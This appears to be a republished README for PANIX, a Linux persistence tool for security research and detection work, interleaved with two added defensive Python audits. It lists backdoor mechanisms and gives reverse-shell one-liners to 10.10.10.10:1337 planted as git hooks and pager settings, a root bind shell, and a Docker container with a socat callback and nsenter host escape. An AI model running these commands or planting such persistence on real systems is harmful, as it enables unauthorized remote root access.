PANIX is a highly customizable Linux persistence tool for security research, detection engineering, penetration testing, CTFs and more. It prioritizes functionality over stealth and is easy to detect. PANIX supports popular distributions such as Debian, Ubuntu and RHEL, and is highly customizable to fit a wide range of operating system environments. PANIX will be kept in step with the most common *nix persistence mechanisms observed in the wild.
Features
PANIX provides a versatile set of features for simulating and studying Linux persistence mechanisms.
| Feature | Description | Root | User |
|---|---|---|---|
| At Job Persistence | At job persistence | ✓ | ✓ |
| Authorized Keys Persistence | Add public key to authorized keys | ✓ | ✓ |
| Backdoor User | Create backdoor user with uid=0 | ✓ | ✗ |
| Bind Shell | Execute backgrounded bind shell | ✓ | ✓ |
| Capabilities Backdoor | Add capabilities for persistence | ✓ | ✗ |
| Cron Job Persistence | Cron job persistence | ✓ | ✓ |
| Create User | Create a new user | ✓ | ✗ |
| Git Persistence | Git hook/pager persistence | ✓ | ✓ |
| Generator Persistence | Systemd generator persistence | ✓ | ✗ |
| Init.d Backdoor | SysV Init (init.d) persistence | ✓ | ✗ |
| Malicious Package Backdoor | DPKG/RPM package persistence | ✓ | ✗ |
| Docker Container Backdoor | Docker container with host escape | ✓ | ✓ |
| MOTD Backdoor | Message Of The Day (MOTD) persistence | ✓ | ✗ |
| Package Manager Persistence | Package Manager persistence (APT/YUM/DNF) | ✓ | ✗ |
| /etc/passwd Modification | Add user to /etc/passwd directly | ✓ | ✗ |
| Password Change | Change user password | ✓ | ✗ |
| RC.local Backdoor | Run Control (rc.local) persistence | ✓ | ✗ |
| Shell Profile Persistence | Shell profile persistence | ✓ | ✓ |
| SSH Key Persistence | SSH key persistence | ✓ | ✓ |
| Sudoers Backdoor | Sudoers persistence | ✓ | ✗ |
| SUID Backdoor | SUID persistence | ✓ | ✗ |
| System Binary Backdoor | System binary wrapping for persistence | ✓ | ✗ |
| Systemd Service Persistence | Systemd service persistence | ✓ | ✓ |
| Udev Persistence | Udev (driver) persistence | ✓ | ✗ |
| XDG Autostart Persistence | XDG autostart persistence | ✓ | ✓ |
PANIX offers comprehensive support for a range of Linux distributions.
Outdated or custom Linux distributions may use different configurations or lack specific features, which can cause a mechanism to fail on untested versions. If the default command fails, the --custom flag available in most features lets you customize the paths and commands to fit your environment. If that does not work either, you can inspect the script to understand what it does and adapt it to your needs.
| Distribution | Supported | Tested |
|---|---|---|
| Debian | ✓ | Fully tested on Debian 11 and 12 |
| Ubuntu | ✓ | Fully tested on Ubuntu 22.04 |
| Red Hat Enterprise Linux | ✓ | Fully tested on RHEL 9 (MOTD not available) |
| CentOS | ✓ | Fully tested on CentOS Stream 9, 7 (MOTD not available) |
| Fedora | ✓ | Not fully tested |
| Arch Linux | ✓ | Not fully tested |
| OpenSUSE | ✓ | Not fully tested |
Getting Started
Getting PANIX up and running is straightforward: download the script from the releases page and execute it:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh | bash
Or download it and execute it manually:
# Download through curl or wget
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -o panix.sh
wget https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -O panix.sh
# Grant execution permissions and execute the script.
chmod +x panix.sh
./panix.sh
Running the script shows either the root or the user help menu, depending on the privileges of the current user.
panix@panix-demo:~$ sudo ./panix.sh
[PANIX ASCII-art banner]
@RFGroenewoud
Root User Options:
  --at                  At job persistence
  --authorized-keys     Add public key to authorized keys
  --backdoor-user       Create backdoor user
  --bind-shell          Execute backgrounded bind shell
  --cap                 Add capabilities persistence
  --create-user         Create a new user
  --cron                Cron job persistence
  --docker-container    Docker container with host escape
  --generator           Generator persistence
  --git                 Git hook/pager persistence
  --initd               SysV Init (init.d) persistence
  --malicious-package   Build and Install a package for persistence (DPKG/RPM)
  --motd                Message Of The Day (MOTD) persistence (not available on RHEL derivatives)
  --package-manager     Package Manager persistence (APT/YUM/DNF)
  --passwd-user         Add user to /etc/passwd directly
  --password-change     Change user password
  --rc-local            Run Control (rc.local) persistence
  --shell-profile       Shell profile persistence
  --ssh-key             SSH key persistence
  --sudoers             Sudoers persistence
  --suid                SUID persistence
  --system-binary       System binary persistence
  --systemd             Systemd service persistence
  --udev                Udev (driver) persistence
  --xdg                 XDG autostart persistence
  --revert              Revert most changes made by PANIX's default options
  --quiet (-q)          Quiet mode (no banner)
Examples
The script should be largely self-explanatory; nevertheless, this section shows a few examples of how PANIX can be used.
Each persistence mechanism has its own help menu:
root@ubuntu2204:/home/ruben# ./panix.sh --udev --help
Usage: ./panix.sh --udev [OPTIONS]
  --examples                   Display command examples
  --default                    Use default udev settings
    --ip <ip>                  Specify IP address
    --port <port>              Specify port number
    --at | --cron | --systemd  Specify the mechanism to use
  --custom                     Use custom udev settings
    --command <command>        Specify custom command
    --path <path>              Specify custom path
Each persistence mechanism also has an --examples flag that prints default and custom examples to help you build a command that fits your needs.
root@ubuntu2204:/home/ruben# ./panix.sh --git --examples
Examples:
--default:
./panix.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager
--custom:
./panix.sh --git --custom --command "(nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &) &" --path "gitdir/.git/hooks/pre-commit" --hook
./panix.sh --git --custom --command "nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 & ${PAGER:-less}" --path "~/.gitconfig" --pager
Most persistence mechanisms are very simple and (hopefully) need little explanation. For example, systemd persistence is set up by running just the following command:
root@ubuntu2204:/home/ruben# ./panix.sh --systemd --default --ip 10.10.10.10 --port 1337
Service file created successfully!
Timer file created successfully!
Created symlink /etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.
[+] Systemd service persistence established!
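The systemd run above leaves a timer symlink in /etc/systemd/system/timers.target.wants that points into /usr/local/lib/systemd/system, and the --git examples before it install a reverse-shell one-liner either as a pre-commit hook or as core.pager in ~/.gitconfig. As an added example for detection engineers (this is not part of PANIX and not the project's code), the following Python audit walks a filesystem root and flags both artefact types: wants-symlinks whose target lies outside the usual unit directories, and git hooks or pager settings containing payload-like tokens. It runs against a constructed temporary tree that mirrors the transcript; the expected-unit-directory list and the token list are assumptions to adjust per site.

```python
import os
import shutil
import tempfile
from pathlib import Path
from typing import List, Optional

# Directories from which packages and administrators normally install units.
# systemd also honours /usr/local/lib/systemd/system (the path in the PANIX
# output above), but it is rare enough to merit review. Assumption: typical
# Debian/RHEL layout; adjust for your site.
EXPECTED_UNIT_DIRS = (
    "/etc/systemd/system/",
    "/lib/systemd/system/",
    "/usr/lib/systemd/system/",
)

# Substrings typical of the one-liners shown in the --examples output above.
SUSPICIOUS_TOKENS = ("/dev/tcp/", "nohup setsid", "bash -i", "socat ")


def audit_systemd_wants(root: Path) -> List[str]:
    """Flag symlinks in etc/systemd/system/*.wants whose raw link target lies
    outside EXPECTED_UNIT_DIRS (readlink, not resolve, so dangling links count)."""
    findings = []
    base = root / "etc/systemd/system"
    if not base.is_dir():
        return findings
    for wants in sorted(base.glob("*.wants")):
        for link in sorted(wants.iterdir()):
            if not link.is_symlink():
                continue
            target = os.readlink(link)
            if not target.startswith(EXPECTED_UNIT_DIRS):
                findings.append(f"systemd: {link.relative_to(root)} -> {target} "
                                "(unit outside expected directories)")
    return findings


def gitconfig_pager(text: str) -> Optional[str]:
    """Return core.pager from gitconfig text. Parsed by hand because
    configparser treats git's indented 'key = value' lines as continuations."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "core" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "pager":
                return value.strip()
    return None


def audit_git(root: Path) -> List[str]:
    """Flag active (non-.sample) git hooks and core.pager values with payload tokens."""
    findings = []
    for hook in sorted(root.glob("**/.git/hooks/*")):
        if not hook.is_file() or hook.name.endswith(".sample"):
            continue
        text = hook.read_text(errors="replace")
        hits = [t for t in SUSPICIOUS_TOKENS if t in text]
        if hits:
            findings.append(f"git hook: {hook.relative_to(root)} contains {hits}")
    for cfg in sorted(root.glob("**/.gitconfig")):
        pager = gitconfig_pager(cfg.read_text(errors="replace"))
        if pager and any(t in pager for t in SUSPICIOUS_TOKENS):
            findings.append(f"git pager: {cfg.relative_to(root)} core.pager = {pager!r}")
    return findings


def audit_host(root: Path = Path("/")) -> List[str]:
    return audit_systemd_wants(root) + audit_git(root)


def build_sample_tree() -> Path:
    """Constructed fixture mirroring the artefacts in the PANIX output above;
    nothing here was captured from a real host."""
    root = Path(tempfile.mkdtemp(prefix="panix-audit-"))
    wants = root / "etc/systemd/system/timers.target.wants"
    wants.mkdir(parents=True)
    os.symlink("/lib/systemd/system/fstrim.timer", wants / "fstrim.timer")  # benign
    os.symlink("/usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer",
               wants / "dbus-org.freedesktop.resolved.timer")  # as created by PANIX
    hooks = root / "home/ruben/project/.git/hooks"
    hooks.mkdir(parents=True)
    payload = "bash -i >& /dev/tcp/10.10.10.10/1337 0>&1"
    (hooks / "pre-commit").write_text(
        f"#!/bin/bash\n(nohup setsid /bin/bash -c '{payload}' > /dev/null 2>&1 &) &\n")
    (hooks / "pre-push.sample").write_text("#!/bin/sh\n# stock sample hook\n")
    (root / "home/ruben/.gitconfig").write_text(
        "[user]\n\tname = ruben\n[core]\n"
        f"\tpager = nohup setsid /bin/bash -c '{payload}' > /dev/null 2>&1 & ${{PAGER:-less}}\n")
    return root


def run_demo() -> List[str]:
    """Build the fixture, audit it, clean up, and return the findings."""
    root = build_sample_tree()
    try:
        return audit_host(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

On a real host run `audit_host()` with the default root as a user that can read home directories; the constructed fixture yields three findings (the timer symlink, the pre-commit hook and the gitconfig pager) while the stock fstrim.timer link and the .sample hook stay silent.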
When setting up a persistence mechanism, the script tells you whether it worked and, where extra information is needed to use the mechanism, prints that as well. For example, the bind shell mechanism:
root@ubuntu2204:/home/ruben#
[+] Bind shell binary /tmp/bd64 created and executed in the background.
[+] The bind shell is listening on port 9001.
[+] To interact with it from a different system, use: nc -nv <IP> 9001
[+] Bind shell persistence established!
This lets you interact with the bind shell:
❯ nc -nv 192.168.211.130 9001
(UNKNOWN) [192.168.211.130] 9001 (?) open
whoami
root
The same goes for mechanisms with additional built-in functionality, such as the Docker persistence mechanism, which comes with a built-in root host escape:
ruben@ubuntu2204:~$ sudo ./panix.sh --docker-container --ip 192.168.211.131 --port 330
[+] Building 10.4s (9/9) FINISHED                                                  docker:default
 => [internal] load build definition from Dockerfile                                         0.0s
 => => transferring dockerfile: 722B                                                         0.0s
 => [internal] load metadata for docker.io/library/alpine:latest                             2.1s
 => [internal] load .dockerignore                                                            0.0s
 => => transferring context: 2B                                                              0.0s
 => [1/5] FROM docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0  0.8s
 => => resolve docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0  0.0s
 => => sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 1.85kB / 1.85kB  0.0s
 => => sha256:dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76 528B / 528B      0.0s
 => => sha256:a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd9414687 1.47kB / 1.47kB  0.0s
 => => sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 3.62MB / 3.62MB  0.4s
 => => extracting sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99       0.2s
 => [2/5] RUN apk add --no-cache bash socat sudo util-linux procps                           4.4s
 => [3/5] RUN adduser -D lowprivuser                                                         0.6s
 => [4/5] RUN echo '#!/bin/bash' > /usr/local/bin/entrypoint.sh && echo 'while true; do /bin/bash -c "socat exec:"/bin/bash",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330"  0.8s
 => [5/5] RUN echo '#!/bin/bash' > /usr/local/bin/escape.sh && echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' >> /usr/local/bin/escape.sh && chmod +x /usr/local/bin/escape.sh && ec  0.8s
 => exporting to image                                                                       0.6s
 => => exporting layers                                                                      0.6s
 => => writing image sha256:b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d248790  0.0s
 => => naming to docker.io/library/malicious-container                                       0.0s
86ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef
[+] Persistence through malicious Docker container complete.
[+] To escape the container with root privileges, run '/usr/local/bin/escape.sh'.
It shows you how to escape the container and gain access to the host.
❯ nc -nvlp 330
listening on [any] 330 ...
connect to [192.168.211.131] from (UNKNOWN) [192.168.211.130] 43400
86ce6b00e872:/$ /usr/local/bin/escape.sh
/usr/local/bin/escape.sh
root:~#
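The escape script baked into the image above runs `sudo nsenter -t 1 -m -u -i -n -p -- su -`, which only succeeds when the container can see the host's PID 1 (shared host PID namespace) and holds the capabilities needed to enter its namespaces, in practice a privileged container. The page does not show the `docker run` flags PANIX uses, so as an added example for defenders (not part of PANIX and not the project's code) the following Python check audits `docker inspect` output for exactly those settings plus the classic root-filesystem and docker.sock bind mounts. The inspect records are constructed samples shaped like the real command's JSON; the short container ID and the image name come from the transcript, the container names are made up.

```python
import json
import sys
from typing import Dict, List

# Constructed sample shaped like `docker inspect` output. The second record reuses
# the container ID and image name from the transcript above; the container names
# and the first record are invented for the demonstration.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "1f2e3d4c5b6a",
        "Name": "/web",
        "Config": {"Image": "nginx:alpine"},
        "HostConfig": {"Privileged": False, "PidMode": "", "CapAdd": None, "Binds": None},
    },
    {
        "Id": "86ce6b00e872",
        "Name": "/panix-demo",
        "Config": {"Image": "malicious-container"},
        "HostConfig": {"Privileged": True, "PidMode": "host", "CapAdd": None, "Binds": None},
    },
])

# Host paths that, once bind-mounted, hand the container control of the host.
DANGEROUS_BIND_SOURCES = {"/", "/var/run/docker.sock", "/run/docker.sock"}


def escape_risk(container: dict) -> List[str]:
    """Return the HostConfig settings that make an nsenter-style host escape possible."""
    hc = container.get("HostConfig") or {}
    reasons = []
    if hc.get("Privileged"):
        reasons.append("privileged (all capabilities, default seccomp/AppArmor profiles off)")
    if hc.get("PidMode") == "host":
        reasons.append("host PID namespace (host PID 1 visible to nsenter -t 1)")
    caps = {c.upper().removeprefix("CAP_") for c in (hc.get("CapAdd") or [])}
    if caps & {"SYS_ADMIN", "ALL"}:
        reasons.append("CAP_SYS_ADMIN or ALL added (setns into foreign namespaces)")
    for bind in hc.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if src in DANGEROUS_BIND_SOURCES:
            reasons.append(f"host path {src} bind-mounted")
    return reasons


def audit_inspect(inspect_json: str) -> Dict[str, List[str]]:
    """Map container name -> risk reasons for every container that has at least one."""
    result = {}
    for container in json.loads(inspect_json):
        reasons = escape_risk(container)
        if reasons:
            name = container.get("Name", container.get("Id", "?")).lstrip("/")
            result[name] = reasons
    return result


if __name__ == "__main__":
    # Real use: docker inspect $(docker ps -q) | python3 audit_docker.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, reasons in audit_inspect(data).items():
        print(f"{name}: " + "; ".join(reasons))
```

Run without input to see the sample verdict, or pipe real `docker inspect` JSON in; the check is deliberately limited to settings a reviewer can verify from the inspect record, so a container that reaches the host through a kernel bug or a misconfigured runtime will not show up here.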
PANIX can clean up most of the mess it leaves behind with the --revert command.
root@ubuntu2204:/home/ruben#
[+] Running as root...
[+] Cleaning Systemd persistence methods...
[+] Successfully cleaned persistence method Systemd
[+] Cleaning Cron persistence methods...
[+] Successfully cleaned persistence method Cron
...
[+] Cleaning Docker persistence methods...
[+] Successfully cleaned persistence method Docker
[+] Cleaning Malicious package persistence methods...
[+] Successfully cleaned persistence method Malicious package
Download: https://github.com/Aegrah/PANIX
Originally published on the WeChat public account Ots安全: PANIX is a highly customizable Linux persistence tool